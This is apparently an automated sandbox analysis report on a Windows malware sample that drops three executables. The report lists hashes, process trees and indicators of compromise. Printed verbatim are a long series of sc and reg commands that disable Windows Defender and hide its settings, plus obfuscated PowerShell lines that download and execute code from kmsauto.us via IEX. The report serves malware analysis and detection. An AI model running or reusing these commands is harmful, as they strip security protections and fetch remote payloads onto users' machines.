Analysis
-
max time kernel
78s
-
max time network
126s
-
platform
windows10_x64
-
resource
win10v20210408
-
submitted
29-08-2021 05:12
Static task
static1
Behavioral task
behavioral1
Sample
006b91eb_IHyB_31ECD.exe
Resource
win7v20210408
General
-
Target
006b91eb_IHyB_31ECD.exe
-
Size
1010KB
-
MD5
006b91eb6fe52d68af0c7e6b6ee0cdf5
-
SHA1
a797f0062757264d9ed96fb16dbbe1f997891cb4
-
SHA256
2181fc561eed3985e3f6922bfc50bb1a761377874ab0e86344bdc74505ed8f5c
-
SHA512
3318ae6b954591db13537c8c04630a9914cdd51bfd4ef7c372f7bfb2cd33f572d06041ed99b97ed44796a3654891e444598ab15a102d86efa7ae9a80afccc634
Malware Config
Extracted
https://kmsauto.us/ALL.txt
Extracted
https://kmsauto.us/ra/ALL.txt
Signatures
-
suricata: ET MALWARE PE EXE or DLL Windows file download Text
-
Blocklisted process makes network request 6 IoCs
Processes:
mshta.exe, mshta.exe, powershell.exe, powershell.exe
flow  pid   process
34    1908  mshta.exe
35    3544  mshta.exe
36    3568  powershell.exe
37    4000  powershell.exe
43    4000  powershell.exe
44    4000  powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
AZfzxQH4.com, Thud6vUm.com, HJRNsXOY.com
pid   process
388   AZfzxQH4.com
2760  Thud6vUm.com
1308  HJRNsXOY.com
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exe, WerFault.exe
pid  pid_target  process       target process
792  3568        WerFault.exe  powershell.exe
752  4000        WerFault.exe  powershell.exe
-
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes:
powershell.exe, powershell.exe, WerFault.exe, WerFault.exe
pid   process
4000  powershell.exe
3568  powershell.exe
4000  powershell.exe
3568  powershell.exe
3568  powershell.exe
4000  powershell.exe
792   WerFault.exe
792   WerFault.exe
792   WerFault.exe
792   WerFault.exe
792   WerFault.exe
792   WerFault.exe
792   WerFault.exe
792   WerFault.exe
792   WerFault.exe
792   WerFault.exe
792   WerFault.exe
792   WerFault.exe
792   WerFault.exe
792   WerFault.exe
752   WerFault.exe
752   WerFault.exe
752   WerFault.exe
752   WerFault.exe
752   WerFault.exe
752   WerFault.exe
752   WerFault.exe
752   WerFault.exe
752   WerFault.exe
752   WerFault.exe
752   WerFault.exe
752   WerFault.exe
752   WerFault.exe
752   WerFault.exe
752   WerFault.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exe, powershell.exe, WerFault.exe, WerFault.exe
description              pid   process
Token: SeDebugPrivilege  3568  powershell.exe
Token: SeDebugPrivilege  4000  powershell.exe
Token: SeDebugPrivilege  792   WerFault.exe
Token: SeDebugPrivilege  752   WerFault.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
006b91eb_IHyB_31ECD.exe, Thud6vUm.com, HJRNsXOY.com, AZfzxQH4.com, cmd.exe, cmd.exe
description                       pid   process                  target process
PID 564 wrote to memory of 388    564   006b91eb_IHyB_31ECD.exe  AZfzxQH4.com
PID 564 wrote to memory of 388    564   006b91eb_IHyB_31ECD.exe  AZfzxQH4.com
PID 564 wrote to memory of 388    564   006b91eb_IHyB_31ECD.exe  AZfzxQH4.com
PID 564 wrote to memory of 2760   564   006b91eb_IHyB_31ECD.exe  Thud6vUm.com
PID 564 wrote to memory of 2760   564   006b91eb_IHyB_31ECD.exe  Thud6vUm.com
PID 2760 wrote to memory of 1908  2760  Thud6vUm.com             mshta.exe
PID 2760 wrote to memory of 1908  2760  Thud6vUm.com             mshta.exe
PID 564 wrote to memory of 1308   564   006b91eb_IHyB_31ECD.exe  HJRNsXOY.com
PID 564 wrote to memory of 1308   564   006b91eb_IHyB_31ECD.exe  HJRNsXOY.com
PID 1308 wrote to memory of 3544  1308  HJRNsXOY.com             mshta.exe
PID 1308 wrote to memory of 3544  1308  HJRNsXOY.com             mshta.exe
PID 388 wrote to memory of 988    388   AZfzxQH4.com             cmd.exe
PID 388 wrote to memory of 988    388   AZfzxQH4.com             cmd.exe
PID 988 wrote to memory of 2172   988   cmd.exe                  sc.exe
PID 988 wrote to memory of 2172   988   cmd.exe                  sc.exe
PID 988 wrote to memory of 2288   988   cmd.exe                  sc.exe
PID 988 wrote to memory of 2288   988   cmd.exe                  sc.exe
PID 988 wrote to memory of 1596   988   cmd.exe                  sc.exe
PID 988 wrote to memory of 1596   988   cmd.exe                  sc.exe
PID 988 wrote to memory of 2120   988   cmd.exe                  sc.exe
PID 988 wrote to memory of 2120   988   cmd.exe                  sc.exe
PID 988 wrote to memory of 3856   988   cmd.exe                  sc.exe
PID 988 wrote to memory of 3856   988   cmd.exe                  sc.exe
PID 988 wrote to memory of 3852   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3852   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3928   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3928   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3904   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3904   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 4040   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 4040   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3208   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3208   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3736   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3736   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3260   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3260   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 920    988   cmd.exe                  reg.exe
PID 988 wrote to memory of 920    988   cmd.exe                  reg.exe
PID 988 wrote to memory of 196    988   cmd.exe                  reg.exe
PID 988 wrote to memory of 196    988   cmd.exe                  reg.exe
PID 988 wrote to memory of 1980   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 1980   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 2768   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 2768   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3600   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3600   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 2832   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 2832   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3604   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3604   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 1304   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 1304   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 2252   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 2252   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 1596   988   cmd.exe                  cmd.exe
PID 988 wrote to memory of 1596   988   cmd.exe                  cmd.exe
PID 1596 wrote to memory of 2120  1596  cmd.exe                  reg.exe
PID 1596 wrote to memory of 2120  1596  cmd.exe                  reg.exe
PID 1596 wrote to memory of 3912  1596  cmd.exe                  find.exe
PID 1596 wrote to memory of 3912  1596  cmd.exe                  find.exe
PID 988 wrote to memory of 3900   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 3900   988   cmd.exe                  reg.exe
PID 988 wrote to memory of 2664   988   cmd.exe                  reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\006b91eb_IHyB_31ECD.exe
"C:\Users\Admin\AppData\Local\Temp\006b91eb_IHyB_31ECD.exe"
1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.com
"C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.com"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CBA2.tmp\CBA3.tmp\CBA4.bat C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.com"
3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
4⤵
-
C:\Windows\system32\sc.exe
sc config SecurityHealthService start=disabled
4⤵
-
C:\Windows\system32\sc.exe
sc config Sense start=disabled
4⤵
-
C:\Windows\system32\sc.exe
sc config WdNisDrv start=disabled
4⤵
-
C:\Windows\system32\sc.exe
sc config WdNisSvc start=disabled
4⤵
-
C:\Windows\system32\reg.exe
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"
4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"
5⤵
-
C:\Windows\system32\find.exe
find /i "SecHealthUI"
5⤵
-
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
4⤵
-
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-1594587808-2047097707-2163810515-1000\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
4⤵
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
4⤵
-
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
5⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f
4⤵
-
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
4⤵
-
C:\Users\Admin\AppData\Local\Temp\Thud6vUm.com
"C:\Users\Admin\AppData\Local\Temp\Thud6vUm.com"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt
3⤵
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4000 -s 2464
5⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\HJRNsXOY.com
"C:\Users\Admin\AppData\Local\Temp\HJRNsXOY.com"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt
3⤵
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3568 -s 2532
5⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Downloads
-
C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.com
MD5
1f460870b7a0a5979925cef15b0ca8ee
SHA1
4c5ac8f5ead53e0ba504c20c238e8f9fb3e435e6
SHA256
7f1db23c8550c2baf0fc007b2ebf7532ceacb3e8f38d8edfb29b250c6fed5273
SHA512
909826c719b23b4efd37fb53b0700394c398ff8da75f46833c70db16081121d22fd573c4133723f45c71f0b377ad458764140484329f07360a643263ac0ff2c0
-
C:\Users\Admin\AppData\Local\Temp\CBA2.tmp\CBA3.tmp\CBA4.bat
MD5
4daac34f17ecb3f09ce92bf60d62144a
SHA1
73898316bf67ab815528d4996e7f04185297baa8
SHA256
3f4f8c7e86bcc0432e2835771ae63fbc2b226be760c3190a96dcbe453cbbcb9d
SHA512
09f5fc715324dae244c229673cc2a86e93ade56ecd841c1b430389322b6e6d259debd852cb1d6b260c2a27aa2086f16d16ca9be81b1ac69ecbb0ea1c399a0bd3
-
C:\Users\Admin\AppData\Local\Temp\HJRNsXOY.com
MD5
b48dea0c642487df2482ab8fa55bb923
SHA1
50b00f687892a656319aefcecba535459e2d8a2d
SHA256
0dfe7a93ff40834c072c7fdd9381771b1086b67f545fa83c766b2d67a911e47b
SHA512
2b57678d9817fbc42c5d2f9e8b2cf0ff12b67882cc18e624422857be950810a4ea63c857700d7cf5a91ea66ed6a5074a3bfab6eff883c66457db8c611bde6e16
-
C:\Users\Admin\AppData\Local\Temp\Thud6vUm.com
MD5
d38aea02881ff45b60e6b2c11cd44916
SHA1
ab4d6992c292931c297ca55d3d2ee34df64b7f7b
SHA256
aa7ff8badcffdff66df6d30bde51b6e3c960be0a3719b73d3875af8e1173bd94
SHA512
c42fc67b08e130e2ea188328c7dbb69be6ae8c575cb79301117bbc22c4b292c59e0f186e25443e394fa36b34122c347c32e85d73716949812c3798880071ee7f
-
C:\Users\Public\ Microsoft.ps1
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e